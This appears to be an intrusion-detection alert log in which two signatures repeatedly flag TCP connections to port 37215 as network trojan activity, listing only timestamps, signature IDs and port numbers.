                Timestamp:05/29/24-15:16:04.257018
                SID:2835222
                Source Port:59852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869715
                SID:2835222
                Source Port:41638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227527
                SID:2835222
                Source Port:51814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.840390
                SID:2835222
                Source Port:58996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165211
                SID:2829579
                Source Port:55970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.514201
                SID:2835222
                Source Port:56092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210901
                SID:2835222
                Source Port:44706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133165
                SID:2835222
                Source Port:52350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.280429
                SID:2829579
                Source Port:47492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.722468
                SID:2835222
                Source Port:35438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.588613
                SID:2835222
                Source Port:37042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912927
                SID:2835222
                Source Port:60208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.820944
                SID:2829579
                Source Port:57856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.643755
                SID:2835222
                Source Port:57204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.915440
                SID:2829579
                Source Port:33182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436602
                SID:2829579
                Source Port:51550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881299
                SID:2829579
                Source Port:54930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.572583
                SID:2835222
                Source Port:45560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618867
                SID:2829579
                Source Port:45898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667099
                SID:2829579
                Source Port:39526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.547621
                SID:2829579
                Source Port:39246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.572001
                SID:2835222
                Source Port:50906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.797807
                SID:2835222
                Source Port:60378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.964084
                SID:2829579
                Source Port:49680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227661
                SID:2829579
                Source Port:46810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557948
                SID:2829579
                Source Port:48252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962777
                SID:2829579
                Source Port:58864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.447257
                SID:2829579
                Source Port:38562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364109
                SID:2829579
                Source Port:55016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.984990
                SID:2829579
                Source Port:53422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931625
                SID:2835222
                Source Port:38736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441499
                SID:2835222
                Source Port:49532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618747
                SID:2829579
                Source Port:38652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714028
                SID:2835222
                Source Port:41566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.585309
                SID:2835222
                Source Port:35100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.468489
                SID:2829579
                Source Port:38214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652768
                SID:2835222
                Source Port:55672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.513673
                SID:2829579
                Source Port:38576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.395864
                SID:2835222
                Source Port:60722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928335
                SID:2829579
                Source Port:60142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.683619
                SID:2829579
                Source Port:58726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665188
                SID:2829579
                Source Port:52444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840908
                SID:2829579
                Source Port:52314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212954
                SID:2829579
                Source Port:38566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176762
                SID:2835222
                Source Port:55836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180304
                SID:2835222
                Source Port:37392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.579387
                SID:2829579
                Source Port:58598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.849333
                SID:2829579
                Source Port:55350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764672
                SID:2835222
                Source Port:52862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887732
                SID:2835222
                Source Port:44598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950319
                SID:2829579
                Source Port:34716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873121
                SID:2835222
                Source Port:48020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.847960
                SID:2835222
                Source Port:34406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989807
                SID:2835222
                Source Port:40644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.038624
                SID:2829579
                Source Port:43754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843222
                SID:2835222
                Source Port:60504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893686
                SID:2829579
                Source Port:52954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926841
                SID:2835222
                Source Port:43194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716401
                SID:2835222
                Source Port:44440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631394
                SID:2835222
                Source Port:56184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.048898
                SID:2829579
                Source Port:36880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445390
                SID:2829579
                Source Port:59880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583201
                SID:2835222
                Source Port:39936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687210
                SID:2835222
                Source Port:47072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562118
                SID:2835222
                Source Port:44024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856819
                SID:2829579
                Source Port:43792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992712
                SID:2835222
                Source Port:43886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.557614
                SID:2829579
                Source Port:54172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.963276
                SID:2835222
                Source Port:54826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909907
                SID:2829579
                Source Port:34880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208094
                SID:2835222
                Source Port:40760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336055
                SID:2829579
                Source Port:44866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.604975
                SID:2835222
                Source Port:53520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.517662
                SID:2835222
                Source Port:49324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501853
                SID:2835222
                Source Port:57260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437047
                SID:2829579
                Source Port:35976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.598251
                SID:2829579
                Source Port:44862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.280565
                SID:2835222
                Source Port:37354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221786
                SID:2835222
                Source Port:58768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461883
                SID:2835222
                Source Port:41542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325272
                SID:2835222
                Source Port:37254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660158
                SID:2835222
                Source Port:41202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362864
                SID:2829579
                Source Port:58896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035357
                SID:2829579
                Source Port:40030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.519836
                SID:2829579
                Source Port:38690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160454
                SID:2835222
                Source Port:56446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227285
                SID:2835222
                Source Port:54292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816712
                SID:2829579
                Source Port:38514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502668
                SID:2829579
                Source Port:40334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038897
                SID:2835222
                Source Port:45134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.216863
                SID:2835222
                Source Port:46908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914701
                SID:2835222
                Source Port:32900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.960887
                SID:2829579
                Source Port:39246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.164876
                SID:2829579
                Source Port:57094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.817086
                SID:2829579
                Source Port:48464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668585
                SID:2835222
                Source Port:39554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684553
                SID:2835222
                Source Port:50652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339676
                SID:2829579
                Source Port:44608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001180
                SID:2829579
                Source Port:38132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.810420
                SID:2835222
                Source Port:43070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361812
                SID:2829579
                Source Port:47376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688209
                SID:2835222
                Source Port:47956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783677
                SID:2835222
                Source Port:45056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422562
                SID:2835222
                Source Port:40490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782506
                SID:2829579
                Source Port:35444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931257
                SID:2829579
                Source Port:59786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521880
                SID:2829579
                Source Port:41554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.913889
                SID:2829579
                Source Port:42624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.971346
                SID:2835222
                Source Port:43584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166453
                SID:2829579
                Source Port:53232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.216845
                SID:2835222
                Source Port:45610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420172
                SID:2829579
                Source Port:45280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873116
                SID:2829579
                Source Port:43302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968719
                SID:2835222
                Source Port:37392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.560739
                SID:2835222
                Source Port:44140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728497
                SID:2829579
                Source Port:47480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965687
                SID:2835222
                Source Port:49658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.837326
                SID:2829579
                Source Port:43568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653174
                SID:2835222
                Source Port:57578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688952
                SID:2829579
                Source Port:55452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263162
                SID:2835222
                Source Port:33746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982959
                SID:2835222
                Source Port:52728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.544559
                SID:2835222
                Source Port:41064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335425
                SID:2835222
                Source Port:35680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782843
                SID:2829579
                Source Port:38238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.394854
                SID:2829579
                Source Port:59194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786257
                SID:2829579
                Source Port:51112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848402
                SID:2829579
                Source Port:50648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855500
                SID:2835222
                Source Port:48512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.179753
                SID:2835222
                Source Port:60186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659502
                SID:2829579
                Source Port:33780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583493
                SID:2829579
                Source Port:42006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039389
                SID:2829579
                Source Port:41328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854169
                SID:2829579
                Source Port:41548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.287502
                SID:2835222
                Source Port:57126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.538099
                SID:2829579
                Source Port:43408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421967
                SID:2835222
                Source Port:33248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655823
                SID:2835222
                Source Port:37166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.821529
                SID:2829579
                Source Port:59588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852841
                SID:2829579
                Source Port:36568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919897
                SID:2835222
                Source Port:55788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899617
                SID:2835222
                Source Port:33314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965785
                SID:2829579
                Source Port:52560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.919428
                SID:2829579
                Source Port:48082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816043
                SID:2835222
                Source Port:44572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.220575
                SID:2829579
                Source Port:48334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900470
                SID:2829579
                Source Port:51714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.996459
                SID:2829579
                Source Port:39478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386218
                SID:2835222
                Source Port:55312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811641
                SID:2829579
                Source Port:47258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.935932
                SID:2829579
                Source Port:34226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.895920
                SID:2835222
                Source Port:48408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.087183
                SID:2829579
                Source Port:41560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994540
                SID:2829579
                Source Port:43958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505371
                SID:2829579
                Source Port:42278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740395
                SID:2835222
                Source Port:50168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766781
                SID:2829579
                Source Port:33452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.591091
                SID:2829579
                Source Port:39972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416648
                SID:2829579
                Source Port:46640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162687
                SID:2829579
                Source Port:48852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833484
                SID:2829579
                Source Port:40596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726411
                SID:2829579
                Source Port:54526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652580
                SID:2829579
                Source Port:52184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561876
                SID:2835222
                Source Port:35024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919879
                SID:2829579
                Source Port:47068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381316
                SID:2835222
                Source Port:37202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983387
                SID:2829579
                Source Port:44026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008978
                SID:2829579
                Source Port:47194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988827
                SID:2835222
                Source Port:36778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.787093
                SID:2835222
                Source Port:40366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.731275
                SID:2835222
                Source Port:35434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.083098
                SID:2835222
                Source Port:54612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640695
                SID:2829579
                Source Port:43436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915028
                SID:2835222
                Source Port:45122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.269533
                SID:2829579
                Source Port:59430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659738
                SID:2829579
                Source Port:36692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.218189
                SID:2829579
                Source Port:42500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791635
                SID:2835222
                Source Port:34756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.688877
                SID:2829579
                Source Port:37794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.070265
                SID:2835222
                Source Port:33622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140412
                SID:2835222
                Source Port:35466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764233
                SID:2829579
                Source Port:58296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.588366
                SID:2835222
                Source Port:46500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816959
                SID:2829579
                Source Port:46098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853372
                SID:2835222
                Source Port:36114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824045
                SID:2835222
                Source Port:35648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857039
                SID:2835222
                Source Port:54942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809506
                SID:2829579
                Source Port:58318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335924
                SID:2835222
                Source Port:46208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583409
                SID:2829579
                Source Port:41228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374500
                SID:2835222
                Source Port:38422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640576
                SID:2829579
                Source Port:57130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.960992
                SID:2829579
                Source Port:49020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501111
                SID:2829579
                Source Port:38538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926685
                SID:2829579
                Source Port:60122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521395
                SID:2829579
                Source Port:38082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.562025
                SID:2829579
                Source Port:58568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947787
